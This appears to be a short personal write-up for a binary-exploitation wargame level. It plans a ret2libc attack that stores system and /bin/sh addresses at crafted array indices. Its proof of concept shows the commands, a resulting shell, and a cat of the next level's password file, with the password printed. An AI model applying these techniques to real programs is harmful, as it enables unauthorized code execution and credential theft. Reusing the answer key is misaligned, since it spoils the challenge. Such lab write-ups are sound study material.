possible exploit :
    
    * its possible to concatenate any shellcode to a legal command(store, read, quit)
    * inject the shellcode in command buff.
    * overwrite the return address of main or other function to execute shellcode.
    ===> overiwting the return address of main didn't work since the offeset is + 14 from the end of buff, 
    * overwrite the plt 

format of the pyload :
    * [address of system] + [ adress of return of system]  + [adress of /bin/sh/]

* because its not easy to write 3 continues values , the return of system could be written in an index divisible by 3, it has no effect since the goal is to return to system,
so we can write write before, and after that index , its straightforward.


system = 0xf7e6aed0 = 4159090384    | index = 1073741938
/bin/sh = 0xf7f897ec = 4160264172   | index = 116

******************** POC *******************************

Input command: store
 Number: 4159090384
 Index: 1073741938
 Completed store command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit
$ whoami
level08
$ cat /home/users/level08/.pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
********************************************************